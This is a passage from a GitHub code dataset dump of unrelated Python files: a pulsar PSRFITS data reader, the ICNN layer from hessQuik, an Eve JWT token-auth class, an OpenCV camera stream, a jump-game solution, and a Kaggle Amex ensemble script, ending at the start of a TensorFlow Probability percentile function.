data_rfi.mean(dim=0)\r\n\r\n # #### Remove RFI in frequency ####\r\n # tmp_frq, _ = torch.sort(data_rfi.mean(dim= 0), dim=0) \r\n # med_frq = tmp_frq[nch//2]\r\n # tmp_frq, _ = torch.sort(torch.abs(tmp_frq - med_frq))\r\n # rms_frq = tmp_frq[nch//2]\r\n # sigma_frq = ((data_rfi.mean(dim = 0) - med_frq)/rms_frq).view(-1)\r\n # data_rfi.transpose()[torch.where(sigma_frq > tthresh)] = data_rfi.mean(dim=1)\r\n return data_rfi\r\n\r\n# def disbar(max, dn):\r\n# jd = '\\r %2d%% [%s%s]'\r\n# a = '*'* np.ceil(dn*100/max)\r\n# b = ' '* ((max-dn)*100//max)\r\n# c = (dn/max)*100+1\r\n# print(jd % (c,a,b), end=\"\", flush=True)\r\n\r\ndef read_psrfits_head(psrfits_file, ststart):\r\n \"\"\"\r\n Modified from presto prsfit.py\r\n \"\"\"\r\n global nsampsub, nsubints, numpolns, polnorder\r\n header = {'ibeam':0, 'nbeams':1,}\r\n print(\"Reading...\", psrfits_file, time.time() - ststart)\r\n sys.stdout.flush()\r\n with open (psrfits_file,'rb') as fn:\r\n psr01 = pyfits.open(fn, mode='readonly', memmap=True)\r\n fits_header = psr01['PRIMARY'].header\r\n sub_header = psr01['SUBINT'].header\r\n header['telescope_id'] = fits_header['TELESCOP']\r\n header['machine_id'] = fits_header['BACKEND']\r\n header['source_name'] = fits_header['SRC_NAME']\r\n header['src_raj'] = float(fits_header['RA'].replace(':',''))\r\n header['src_dej'] = float(fits_header['DEC'].replace(':',''))\r\n header['tstart'] = (fits_header['STT_IMJD'] + fits_header['STT_SMJD']/86400.0 + \r\n fits_header['STT_OFFS']/86400.0)\r\n header['fch1'] = (fits_header['OBSFREQ'] + np.abs(fits_header['OBSBW'])/2.0 - \r\n np.abs(sub_header['CHAN_BW'])/2.0)\r\n header['foff'] = -1.0*np.abs(sub_header['CHAN_BW'])\r\n header['nchans'] = sub_header['NCHAN']\r\n header['nbits'] = sub_header['NBITS']\r\n header['tsamp'] = sub_header['TBIN']\r\n header['nifs'] = sub_header['NPOL']\r\n header['totalsm'] = sub_header['NSBLK']*sub_header['NAXIS2']\r\n nsampsub = sub_header['NSBLK']\r\n nsubints = sub_header['NAXIS2'] \r\n numpolns = sub_header['NPOL']\r\n polnorder = sub_header['POL_TYPE']\r\n return header\r\n\r\ndef read_psrfits(psrfits_file, ststart):\r\n \"\"\"\r\n Modified from presto prsfit.py\r\n \"\"\"\r\n header = {'ibeam':0, 'nbeams':1,}\r\n print(\"Reading...\", psrfits_file, time.time() - ststart)\r\n sys.stdout.flush()\r\n with open (psrfits_file,'rb') as fn:\r\n psr01 = pyfits.open(fn, mode='readonly', memmap=True)\r\n fits_header = psr01['PRIMARY'].header\r\n sub_header = psr01['SUBINT'].header\r\n header['telescope_id'] = fits_header['TELESCOP']\r\n header['machine_id'] = fits_header['BACKEND']\r\n header['source_name'] = fits_header['SRC_NAME']\r\n header['src_raj'] = float(fits_header['RA'].replace(':',''))\r\n header['src_dej'] = float(fits_header['DEC'].replace(':',''))\r\n header['tstart'] = (fits_header['STT_IMJD'] + fits_header['STT_SMJD']/86400.0 + \r\n fits_header['STT_OFFS']/86400.0)\r\n header['fch1'] = (fits_header['OBSFREQ'] + np.abs(fits_header['OBSBW'])/2.0 - \r\n np.abs(sub_header['CHAN_BW'])/2.0)\r\n header['foff'] = -1.0*np.abs(sub_header['CHAN_BW'])\r\n header['nchans'] = sub_header['NCHAN']\r\n header['nbits'] = sub_header['NBITS']\r\n header['tsamp'] = sub_header['TBIN']\r\n header['nifs'] = sub_header['NPOL']\r\n header['totalsm'] = sub_header['NSBLK']*sub_header['NAXIS2']\r\n nsampsub = sub_header['NSBLK']\r\n nsubints = sub_header['NAXIS2'] \r\n numpolns = sub_header['NPOL']\r\n polnorder = sub_header['POL_TYPE']\r\n data = np.zeros((header['totalsm'], header['nchans']), dtype=np.float32)\r\n for i in range(nsubints):\r\n psrdata = psr01['SUBINT'].data[i]['DATA']\r\n shp = psrdata.squeeze().shape\r\n if (len(shp)==3 and shp[1]==numpolns and polnorder == 'IQUV'):\r\n # print(\"Polarization is IQUV, just using Stokes I\")\r\n data[i*nsampsub: (i+1)*nsampsub]= psrdata[:,0,:].squeeze()\r\n else:\r\n data[i*nsampsub: (i+1)*nsampsub] = np.asarray(psrdata.squeeze())\r\n return header, data[:, ::-1]\r\n\r\ndef read_file(filen, data_raw, numbits, headsize, countsize, smaple, average, \r\n nchan, freqavg, tstart):\r\n if numbits >= 8: # BITS NUMBER 8/16/32\r\n # with open(str(filen),'rb') as fn:\r\n fn = open(str(filen),'rb')\r\n fn.seek(headsize)\r\n if numbits == 32:\r\n data_raw = np.fromfile(fn, dtype=np.float32, count=countsize)\r\n elif numbits == 16:\r\n data_raw = np.fromfile(fn, dtype=np.uint16, count=countsize)\r\n elif numbits == 8:\r\n data_raw = np.fromfile(fn, dtype=np.uint8, count=countsize)\r\n fn.close()\r\n\r\n if data_raw.size != countsize:\r\n print(\"FILE SIZE ERROR %d / %d %s Time:%.2f sec\"%(data_raw.size, \r\n countsize, filen, (time.time() - tstart)))\r\n sys.stdout.flush()\r\n exit()\r\n data_raw = data_raw.reshape(smaple, average, nchan, freqavg).mean(axis=(1,3))\r\n else: # BITS NUMBER 1/2/4\r\n numbtch = 8//numbits\r\n # with open(str(filen),'rb') as fn:\r\n fn = open(str(filen),'rb')\r\n fn.seek(headsize)\r\n data_raw = np.fromfile(fn, dtype=np.uint8, count=countsize//numbtch)\r\n fn.close()\r\n\r\n if data_raw.size != countsize//numbtch :\r\n print(\"FILE SIZE ERROR %s Time:%.2f sec\"%(filen, \r\n (time.time() - tstart)))\r\n sys.stdout.flush()\r\n exit()\r\n data_raw = data_raw.reshape(smaple*average, (nchan*freqavg)//numbtch, 1).repeat(numbtch, axis=2) \r\n if numbtch == 2 :\r\n for i in range(numbtch):\r\n data_raw[:, :, i] >> i*numbits & 0x0f\r\n elif numbtch == 4 :\r\n for i in range(numbtch):\r\n data_raw[:, :, i] >> i*numbits & 0x03\r\n elif numbtch == 8 :\r\n for i in range(numbtch):\r\n data_raw[:, :, i] >> i*numbits & 0x01 \r\n data_raw = data_raw.reshape(smaple, average, nchan, freqavg).mean(axis=(1,3))\r\n return data_raw ","repo_name":"Xu-Zhijun/STEP","sub_path":"step_lib_comm.py","file_name":"step_lib_comm.py","file_ext":"py","file_size_in_byte":14769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"2129755743","text":"import numpy as np\nfrom scipy.signal import argrelextrema\n\n\ndef compress_eq_neighbor(idxes):\n new_idxes = np.append(idxes, 0)\n return np.asarray([new_idxes[i] for i in range(new_idxes.size - 1)\n if not new_idxes[i] + 1 == new_idxes[i + 1]])\n\n\ndef extr_points(points, indexes=None, extr_type=np.greater_equal):\n if indexes is None:\n indexes = np.asarray(range(points.size))\n\n extr_idx = argrelextrema(points, extr_type)[0]\n extr_idx = compress_eq_neighbor(extr_idx)\n extr_points = np.take(points, extr_idx)\n\n extr_idx = np.take(indexes, extr_idx)\n\n return extr_points, extr_idx","repo_name":"ErkinVasiliy/binance_bot","sub_path":"bot/math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71339025208","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nfrom hessQuik.layers import hessQuikLayer\nimport hessQuik.activations as act\nfrom typing import Union, Tuple\n\n\nclass ICNNLayer(hessQuikLayer):\n r\"\"\"\n Evaluate and compute derivatives of a single layer.\n\n Examples::\n\n >>> import torch, hessQuik.layers as lay\n >>> f = lay.ICNNLayer(4, None, 7)\n >>> x = torch.randn(10, 4)\n >>> fx, dfdx, d2fd2x = f(x, do_gradient=True, do_Hessian=True)\n >>> print(fx.shape, dfdx.shape, d2fd2x.shape)\n torch.Size([10, 11]) torch.Size([10, 4, 11]) torch.Size([10, 4, 4, 11])\n\n \"\"\"\n\n def __init__(self, input_dim: int, in_features: Union[int, None], out_features: int,\n act: act.hessQuikActivationFunction = act.softplusActivation(),\n bias: bool = True,\n device=None, dtype=None) -> None:\n r\"\"\"\n\n :param input_dim: dimension of network inputs\n :type input_dim: int\n :param in_features: number of input features. For first ICNN layer, set ``in_features = None``\n :type in_features: int or``None``\n :param out_features: number of output features\n :type out_features: int\n :param act: activation function\n :type act: hessQuikActivationFunction\n :var K: weight matrix for the network inputs of size :math:`(d, n_{out})`\n :var b: bias vector of size :math:`(n_{out},)`\n :var L: weight matrix for the input features of size :math:`(n_{in}, n_{out})`\n :var nonneg: pointwise function to force :math:`l` to have nonnegative weights. Default: ``torch.nn.functional.softplus``\n \"\"\"\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(ICNNLayer, self).__init__()\n\n self.input_dim = input_dim\n self.in_features = in_features\n self.out_features = out_features\n self.act = act\n\n # extract nonnegative weights\n self.nonneg = F.softplus\n\n self.K = nn.Parameter(torch.empty(input_dim, out_features, **factory_kwargs))\n\n if in_features is not None:\n self.L = nn.Parameter(torch.empty(in_features, out_features, **factory_kwargs))\n else:\n self.register_parameter('L', None)\n\n if bias:\n self.b = nn.Parameter(torch.empty(out_features, **factory_kwargs))\n else:\n self.register_parameter('b', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.kaiming_uniform_(self.K, a=math.sqrt(self.input_dim))\n\n if self.L is not None:\n nn.init.kaiming_uniform_(self.L, a=math.sqrt(self.in_features))\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.L)\n else:\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.K)\n\n bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0\n\n if self.b is not None:\n nn.init.uniform_(self.b, -bound, bound)\n\n def dim_input(self) -> int:\n r\"\"\"\n number of input features + dimension of network inputs\n \"\"\"\n n = self.input_dim\n if self.in_features is not None:\n n += self.in_features\n return n\n\n def dim_output(self) -> int:\n r\"\"\"\n number of output features + dimension of network inputs\n \"\"\"\n return self.out_features + self.input_dim\n\n def forward(self, ux, do_gradient=False, do_Hessian=False, do_Laplacian=False, forward_mode=True,\n dudx=None, d2ud2x=None, v=None):\n r\"\"\"\n Forward propagation through ICNN layer of the form\n\n .. math::\n\n f(x) =\n \\left[\\begin{array}{c} \\sigma\\left(\\left[\\begin{array}{c}u(x) & x\\end{array}\\right]\n \\left[\\begin{array}{c}L^+ \\\\ K\\end{array}\\right] + b\\right) & x \\end{array}\\right]\n\n Here, :math:`u(x)` is the input into the layer of size :math:`(n_s, n_{in})` which is\n a function of the input of the network, :math:`x` of size :math:`(n_s, d)`.\n The output features, :math:`f(x)`, are of size :math:`(n_s, n_{out} + d)`.\n The notation :math:`(\\cdot)^+` is a function that makes the weights of a matrix nonnegative.\n\n As an example, for one sample, :math:`n_s = 1`, the gradient with respect to\n :math:`\\begin{bmatrix} u & x \\end{bmatrix}` is of the form\n\n .. math::\n\n \\nabla_x f = \\text{diag}\\left(\\sigma'\\left(\\left[\\begin{array}{c}u(x) & x\\end{array}\\right]\n \\left[\\begin{array}{c}L^+ \\\\ K\\end{array}\\right] + b\\right)\\right)\n \\left[\\begin{array}{c}(L^+)^\\top & K^\\top\\end{array}\\right]\n \\left[\\begin{array}{c}\\nabla_x u \\\\ I\\end{array}\\right]\n\n where :math:`\\text{diag}` transforms a vector into the entries of a diagonal matrix and :math:`I` is\n the :math:`d \\times d` identity matrix.\n\n \"\"\"\n\n (dfdx, d2fd2x) = (None, None)\n\n M = self.K\n if self.L is not None:\n M = torch.cat((self.nonneg(self.L), M), dim=0)\n\n # affine transformation\n z = ux @ M\n\n if self.b is not None:\n z += self.b\n\n # forward pass\n f, dsig, d2sig = self.act.forward(z, do_gradient=do_gradient, do_Hessian=do_Hessian,\n forward_mode=True if forward_mode is True else None)\n f = torch.cat((f, ux[:, -self.input_dim:]), dim=1)\n\n if (do_gradient or do_Hessian) and forward_mode is True:\n dfdx = dsig.unsqueeze(1) * M\n\n # -------------------------------------------------------------------------------------------------------- #\n if do_Hessian:\n d2fd2x = (d2sig.unsqueeze(1) * M).unsqueeze(2) * M.unsqueeze(0).unsqueeze(0)\n\n # Gauss-Newton approximation\n if dudx is not None:\n d2fd2x = dudx.unsqueeze(1) @ (d2fd2x.permute(0, 3, 1, 2) @ dudx.unsqueeze(1).permute(0, 1, 3, 2))\n d2fd2x = d2fd2x.permute(0, 2, 3, 1)\n\n if d2ud2x is not None:\n # extra term to compute full Hessian\n d2fd2x += d2ud2x @ dfdx.unsqueeze(1)\n\n # concatenate zeros\n Z = torch.zeros(d2fd2x.shape[0], d2fd2x.shape[1], d2fd2x.shape[2], self.input_dim,\n dtype=d2fd2x.dtype, device=d2fd2x.device)\n d2fd2x = torch.cat((d2fd2x, Z), dim=-1)\n # -------------------------------------------------------------------------------------------------------- #\n\n # finish computing gradient\n if dudx is not None:\n dfdx = dudx @ dfdx\n\n I = torch.ones(dfdx.shape[0], 1, 1, dtype=dfdx.dtype, device=dfdx.device) \\\n * torch.eye(self.input_dim, dtype=dfdx.dtype, device=dfdx.device).unsqueeze(0)\n dfdx = torch.cat((dfdx, I), dim=-1)\n\n if (do_gradient or do_Hessian) and forward_mode is False:\n dfdx, d2fd2x = self.backward(do_Hessian=do_Hessian)\n\n return f, dfdx, d2fd2x\n\n def backward(self, do_Hessian=False, dgdf=None, d2gd2f=None, v=None):\n r\"\"\"\n Backward propagation through ICNN layer of the form\n\n .. math::\n\n f(u) =\n \\left[\\begin{array}{c} \\sigma\\left(\\left[\\begin{array}{c}u & x\\end{array}\\right]\n \\left[\\begin{array}{c}L^+ \\\\ K\\end{array}\\right] + b\\right) & x \\end{array}\\right]\n\n Here, the network is :math:`g` is a function of :math:`f(u)`.\n\n As an example, for one sample, :math:`n_s = 1`, the gradient of the network with respect to :math:`u` is of the form\n\n .. math::\n\n \\nabla_{[u,x]} g = \\left(\\sigma'\\left(\\left[\\begin{array}{c}u & x\\end{array}\\right]\n \\left[\\begin{array}{c}L^+ \\\\ K\\end{array}\\right] + b\\right) \\odot \\nabla_{[f, x]} g\\right)\n \\left[\\begin{array}{c}(L^+)^\\top & K^\\top\\end{array}\\right]\n\n where :math:`\\odot` denotes the pointwise product.\n\n \"\"\"\n M = self.K\n if self.L is not None:\n M = torch.cat((self.nonneg(self.L), M), dim=0)\n\n # obtain stored information from backward pass\n d2gd2ux = None\n dsig, d2sig = self.act.backward(do_Hessian=do_Hessian)\n\n # compute gradient\n dgdux = dsig.unsqueeze(1) * M\n\n # augment gradient\n M2 = torch.ones(dgdux.shape[0], 1, 1, dtype=dgdux.dtype, device=dgdux.device) \\\n * torch.eye(self.input_dim, dtype=dgdux.dtype, device=dgdux.device).unsqueeze(0)\n\n if self.in_features is not None:\n Z = torch.zeros(dgdux.shape[0], self.input_dim, self.in_features)\n M2 = torch.cat((Z, M2), dim=-1).permute(0, 2, 1)\n\n dgdux = torch.cat((dgdux, M2), dim=-1)\n\n if do_Hessian:\n # TODO: change order of operations, multiply K's first; check if logic with better naming\n d2gd2ux = (d2sig.unsqueeze(1) * M.unsqueeze(0)).unsqueeze(2) * M.unsqueeze(0).unsqueeze(0)\n\n # concatenate zeros\n Z = torch.zeros(d2gd2ux.shape[0], d2gd2ux.shape[1], d2gd2ux.shape[2], self.input_dim,\n dtype=d2gd2ux.dtype, device=d2gd2ux.device)\n d2gd2ux = torch.cat((d2gd2ux, Z), dim=-1)\n\n if d2gd2f is not None:\n # Gauss-Newton approximation\n h1 = (dgdux.unsqueeze(1) @ d2gd2f.permute(0, 3, 1, 2) @ dgdux.permute(0, 2, 1).unsqueeze(1))\n h1 = h1.permute(0, 2, 3, 1)\n\n # extra term to compute full Hessian\n N, _, _, m = d2gd2ux.shape\n h2 = d2gd2ux.view(N, -1, m) @ dgdf.view(N, m, -1)\n h2 = h2.view(h1.shape)\n\n # combine\n d2gd2ux = h1 + h2\n\n # finish computing gradient\n if dgdf is not None:\n dgdux = dgdux @ dgdf\n\n return dgdux, d2gd2ux\n\n\nif __name__ == '__main__':\n from hessQuik.utils import input_derivative_check\n torch.set_default_dtype(torch.float64)\n\n nex = 11 # no. of examples\n d = 3 # no. of input features\n m = 5 # no. of output features\n x = torch.randn(nex, d)\n f = ICNNLayer(d, None, m, act=act.softplusActivation())\n\n print('======= FORWARD =======')\n input_derivative_check(f, x, do_Hessian=True, verbose=True, forward_mode=True)\n\n print('======= BACKWARD =======')\n input_derivative_check(f, x, do_Hessian=True, verbose=True, forward_mode=False)\n","repo_name":"elizabethnewman/hessQuik","sub_path":"hessQuik/layers/icnn_layer.py","file_name":"icnn_layer.py","file_ext":"py","file_size_in_byte":10415,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"18998724149","text":"import os\nimport jwt\n\nfrom eve import Eve\nfrom eve.auth import TokenAuth\nfrom flask import abort, current_app as api\n\nclass MyAuth(TokenAuth):\n def check_auth(self, token, allowed_roles, resource, method):\n \"\"\" Checks for the validity of the provided JWT and grants access.\n\n First we check to see if any user with a given token exists. If it does,\n we decode the token and check if the payload is verifiable. If so, we're\n good to go. If not, we abort with 401 unauthorized.\n \"\"\"\n\n accounts = api.data.driver.db['accounts']\n lookup = { 'access_token': token }\n if allowed_roles:\n # only retrieve a user if his roles match ``allowed_roles``\n lookup['roles'] = {'$in': allowed_roles}\n account = accounts.find_one(lookup)\n\n if not account:\n abort(401, description=\"The provided access token is invalid or role no allowed\")\n\n try:\n access_payload = jwt.decode(token, os.environ.get('APP_SECRET', 'sekkret'), algorithms=['HS256'])\n\n return account and account['username'] == access_payload['username']\n except jwt.ExpiredSignatureError:\n abort(401, description=\"Your access token is expired.\")\n","repo_name":"caiohsramos/usp-smped-api","sub_path":"app/api/auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38526526403","text":"#====================================#\n# Date: 2023.8.19\n#====================================#\nimport os\nimport cv2\nfrom base_camera import BaseCamera\nimport time\n\n#====================================#\n# Camera\n#====================================#\nclass Camera(BaseCamera):\n video_source = 0 #select camera, 0 for default camera\n\n def __init__(self):\n if os.environ.get('OPENCV_CAMERA_SOURCE'):\n Camera.set_video_source(int(os.environ['OPENCV_CAMERA_SOURCE']))\n super(Camera, self).__init__()\n\n @staticmethod\n def set_video_source(source):\n Camera.video_source = source\n\n @staticmethod\n def frames():\n camera = cv2.VideoCapture(Camera.video_source)\n if not camera.isOpened():\n raise RuntimeError('Could not start camera.')\n\n while True:\n # read current frame\n _, img = camera.read()\n\n # get local time\n timeArray = time.localtime()\n otherStyleTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeArray)\n cv2.putText(img, str(otherStyleTime), (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2)\n\n # encode as a jpeg image and return it\n yield cv2.imencode('.jpg', img)[1].tobytes()","repo_name":"GengJie-Jay/Wildlife-monitor-ENG5105","sub_path":"camera_opencv.py","file_name":"camera_opencv.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32919576443","text":"\"\"\"\nLintCode problem 116: https://www.lintcode.com/problem/116/\n\"\"\"\n\nfrom typing import (\n List,\n)\n\nclass Solution:\n \"\"\"\n @param a: A list of integers\n @return: A boolean\n \"\"\"\n \"\"\"\n Logic: keep track of the previous number, i.e. where are you coming from \n\n Edge case:\n 1. if a list is empty, return False \n \n Initialize a list, tracker, with length of a, populated with False. \n Since it's made clear that the first element of a list >= 1, set \n tracker[0] to True.\n\n For range of (1, length of a), with i:\n For range of i, with j:\n if tracker[j] and j + a[j] >= i:\n tracker[i] = True \n break \n \n return tracker[-1]\n \"\"\"\n def can_jump(self, a: List[int]) -> bool:\n if not a:\n return False \n \n tracker = [False] * len(a) \n tracker[0] = True \n\n for i in range(1, len(a)):\n for j in range(i):\n # 1. make sure where we are coming from is a valid point\n # 2. if the jump length of the j point could reach current i\n if tracker[j] and j + a[j] >= i:\n tracker[i] = True\n break \n \n return tracker[-1]\n","repo_name":"sherry-debug715/Algorithms-notes","sub_path":"Dynamic Programming/coordinates/JumpGame.py","file_name":"JumpGame.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14069740378","text":"\nimport gc\nimport numpy as np\nimport pandas as pd\nimport sys\n\nfrom scipy.optimize import minimize\nfrom tqdm import tqdm\n\nfrom utils import amex_metric_mod, line_notify\n\n#==============================================================================\n# Ensemble by seed\n#==============================================================================\n\nsub_path = '../output/submission_ensemble_seed_avg.csv'\noof_path = '../output/oof_ensemble_seed_avg.csv'\n\nsub_path_lgbm_seed_avg = '../output/submission_lgbm_agg_seed_avg.csv'\nsub_path_cb_seed_avg = '../output/submission_cb_agg_seed_avg.csv'\nsub_path_xgb_seed_avg = '../output/submission_xgb_agg_seed_avg.csv'\n\noof_path_lgbm_seed_avg = '../output/oof_lgbm_agg_seed_avg.csv'\noof_path_cb_seed_avg = '../output/oof_cb_agg_seed_avg.csv'\noof_path_xgb_seed_avg = '../output/oof_xgb_agg_seed_avg.csv'\n\ndef main():\n # load csv\n sub = pd.read_csv('../input/sample_submission.csv')\n oof = pd.read_csv('../input/train_labels.csv')\n\n sub_lgbm = pd.DataFrame()\n sub_cb = pd.DataFrame()\n sub_xgb = pd.DataFrame()\n\n oof_lgbm = pd.DataFrame()\n oof_cb = pd.DataFrame()\n oof_xgb = pd.DataFrame()\n\n sub_lgbm['customer_ID'] = sub['customer_ID']\n sub_cb['customer_ID'] = sub['customer_ID']\n sub_xgb['customer_ID'] = sub['customer_ID']\n\n oof_lgbm['customer_ID'] = oof['customer_ID']\n oof_cb['customer_ID'] = oof['customer_ID']\n oof_xgb['customer_ID'] = oof['customer_ID']\n\n oof_lgbm['target'] = oof['target']\n oof_cb['target'] = oof['target']\n oof_xgb['target'] = oof['target']\n\n sub_lgbm['prediction'] = np.zeros(sub.shape[0])\n sub_cb['prediction'] = np.zeros(sub.shape[0])\n sub_xgb['prediction'] = np.zeros(sub.shape[0])\n\n oof_lgbm['prediction'] = np.zeros(oof.shape[0])\n oof_cb['prediction'] = np.zeros(oof.shape[0])\n oof_xgb['prediction'] = np.zeros(oof.shape[0])\n\n print('seed averaging...')\n for seed in tqdm([42, 52, 62]):\n # load csv\n sub_path_lgbm = f'../output/submission_lgbm_agg_{seed}.csv'\n sub_path_cb = f'../output/submission_cb_agg_{seed}.csv'\n sub_path_xgb = f'../output/submission_xgb_agg_{seed}.csv'\n\n oof_path_lgbm = f'../output/oof_lgbm_agg_{seed}.csv'\n oof_path_cb = f'../output/oof_cb_agg_{seed}.csv'\n oof_path_xgb = f'../output/oof_xgb_agg_{seed}.csv'\n\n tmp_sub_lgbm = pd.read_csv(sub_path_lgbm)\n tmp_sub_cb = pd.read_csv(sub_path_cb)\n tmp_sub_xgb = pd.read_csv(sub_path_xgb)\n\n tmp_oof_lgbm = pd.read_csv(oof_path_lgbm)\n tmp_oof_cb = pd.read_csv(oof_path_cb)\n tmp_oof_xgb = pd.read_csv(oof_path_xgb)\n\n # to rank\n tmp_sub_lgbm['prediction'] = tmp_sub_lgbm['prediction'].rank() / len(tmp_sub_lgbm)\n tmp_sub_cb['prediction'] = tmp_sub_cb['prediction'].rank() / len(tmp_sub_cb)\n tmp_sub_xgb['prediction'] = tmp_sub_xgb['prediction'].rank() / len(tmp_sub_xgb)\n\n tmp_oof_lgbm['prediction'] = tmp_oof_lgbm['prediction'].rank() / len(tmp_oof_lgbm)\n tmp_oof_cb['prediction'] = tmp_oof_cb['prediction'].rank() / len(tmp_oof_cb)\n tmp_oof_xgb['prediction'] = tmp_oof_xgb['prediction'].rank() / len(tmp_oof_xgb)\n \n # average predictions\n sub_lgbm['prediction'] += tmp_sub_lgbm['prediction'] / 3\n sub_cb['prediction'] += tmp_sub_cb['prediction'] / 3\n sub_xgb['prediction'] += tmp_sub_xgb['prediction'] / 3\n\n oof_lgbm['prediction'] += tmp_oof_lgbm['prediction'] / 3\n oof_cb['prediction'] += tmp_oof_cb['prediction'] / 3\n oof_xgb['prediction'] += tmp_oof_xgb['prediction'] / 3\n\n # to rank\n sub_lgbm['prediction'] = sub_lgbm['prediction'].rank() / len(sub_lgbm)\n sub_cb['prediction'] = sub_cb['prediction'].rank() / len(sub_cb)\n sub_xgb['prediction'] = sub_xgb['prediction'].rank() / len(sub_xgb)\n\n oof_lgbm['prediction'] = oof_lgbm['prediction'].rank() / len(oof_lgbm)\n oof_cb['prediction'] = oof_cb['prediction'].rank() / len(oof_cb)\n oof_xgb['prediction'] = oof_xgb['prediction'].rank() / len(oof_xgb)\n\n # calc full score\n full_score_lgbm = round(amex_metric_mod(oof_lgbm['target'], oof_lgbm['prediction']),6)\n full_score_cb = round(amex_metric_mod(oof_cb['target'], oof_cb['prediction']),6)\n full_score_xgb = round(amex_metric_mod(oof_xgb['target'], oof_xgb['prediction']),6)\n\n # LINE notify\n line_notify(f'Full kaggle metric lgbm: {full_score_lgbm}')\n line_notify(f'Full kaggle metric cb: {full_score_cb}')\n line_notify(f'Full kaggle metric xgb: {full_score_xgb}')\n\n # save csv\n sub_lgbm[['customer_ID','prediction']].to_csv(sub_path_lgbm_seed_avg, index=False)\n sub_cb[['customer_ID','prediction']].to_csv(sub_path_cb_seed_avg, index=False)\n sub_xgb[['customer_ID','prediction']].to_csv(sub_path_xgb_seed_avg, index=False)\n\n oof_lgbm[['customer_ID','prediction']].to_csv(oof_path_lgbm_seed_avg, index=False)\n oof_cb[['customer_ID','prediction']].to_csv(oof_path_cb_seed_avg, index=False)\n oof_xgb[['customer_ID','prediction']].to_csv(oof_path_xgb_seed_avg, index=False)\n\n # rename columns\n oof_lgbm.rename(columns={'prediction': 'prediction_lgbm'},inplace=True)\n oof_cb.rename(columns={'prediction': 'prediction_cb'},inplace=True)\n oof_xgb.rename(columns={'prediction': 'prediction_xgb'},inplace=True)\n\n # merge oof\n oof = oof.merge(oof_lgbm,on=['customer_ID','target'],how='left')\n oof = oof.merge(oof_cb,on=['customer_ID','target'],how='left')\n oof = oof.merge(oof_xgb,on=['customer_ID','target'],how='left')\n\n del oof_lgbm, oof_cb, oof_xgb\n gc.collect()\n\n # cols to use\n cols_pred = ['prediction_lgbm','prediction_cb','prediction_xgb']\n\n # objective function for scipy optimize\n def obj_func(weights):\n ''' scipy minimize will pass the weights as a numpy array '''\n final_prediction = 0\n for weight, c in zip(weights, cols_pred):\n final_prediction += weight*oof[c]\n\n return -amex_metric_mod(oof['target'], final_prediction) \n\n # Optimization runs 100 times.\n lls = []\n wghts = []\n print('Optimization runs 100 times...')\n for i in tqdm(range(100)):\n starting_values = np.random.uniform(size=len(cols_pred))\n # cons are given as constraints.\n cons = ({'type':'eq','fun':lambda w: 1-sum(w)})\n bounds = [(0,1)]*len(cols_pred)\n \n res = minimize(obj_func, \n starting_values, \n constraints=cons,\n bounds = bounds, \n method='SLSQP')\n\n lls.append(res['fun'])\n wghts.append(res['x'])\n\n # get weights\n bestSC = np.min(lls)\n w = wghts[np.argmin(lls)] # [0.62779581 0.00637736 0.36582683]\n print('\\n Ensemble Score: {best_score:.7f}'.format(best_score=bestSC))\n print('weights: {}'.format(w))\n\n # calc prediction\n preds = [sub_lgbm, sub_cb, sub_xgb]\n\n oof['prediction'] = 0.0\n for i, (p, c) in enumerate(zip(preds,cols_pred)):\n sub['prediction'] += w[i]*p['prediction']\n oof['prediction'] += w[i]*oof[c]\n\n # save csv\n oof[['customer_ID','target','prediction']].to_csv(oof_path, index=False)\n sub[['customer_ID','prediction']].to_csv(sub_path, index=False)\n\n # Full score and LINE Notify\n full_score = round(amex_metric_mod(oof['target'], oof['prediction']),6)\n\n # LINE notify\n line_notify(f'{sys.argv[0]} done. Full kaggle metric: {full_score}')\n\nif __name__ == '__main__':\n main()","repo_name":"MitsuruFujiwara/Amex-Default-Prediction","sub_path":"src/201_ensemble_seed_avg.py","file_name":"201_ensemble_seed_avg.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33403020599","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Dependency imports\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_probability.python.internal import distribution_util as util\nfrom tensorflow.python.ops import control_flow_ops\n\n__all__ = [\n 'percentile',\n 'quantiles',\n]\n\n\ndef percentile(x,\n q,\n axis=None,\n interpolation=None,\n keep_dims=False,\n validate_args=False,\n preserve_gradients=True,\n name=None):\n \"\"\"Compute the `q`-th percentile(s) of `x`.\n\n Given a vector `x`, the `q`-th percentile of `x` is the value `q / 100` of the\n way from the minimum to the maximum in a sorted copy of `x`.\n\n The values and distances of the two nearest neighbors as well as the\n `interpolation` parameter will determine the percentile if the normalized\n ranking does not match the location of `q` exactly.\n\n This function is the same as the median if `q = 50`, the same as the minimum\n if `q = 0` and the same as the maximum if `q = 100`.\n\n Multiple percentiles can be computed at once by using `1-D` vector `q`.\n Dimension zero of the returned `Tensor` will index the different percentiles.\n\n\n ```python\n # Get 30th percentile with default ('nearest') interpolation.\n x = [1., 2., 3., 4.]\n tfp.stats.percentile(x, q=30.)\n ==> 2.0\n\n # Get 30th percentile with 'linear' interpolation.\n x = [1., 2., 3., 4.]\n 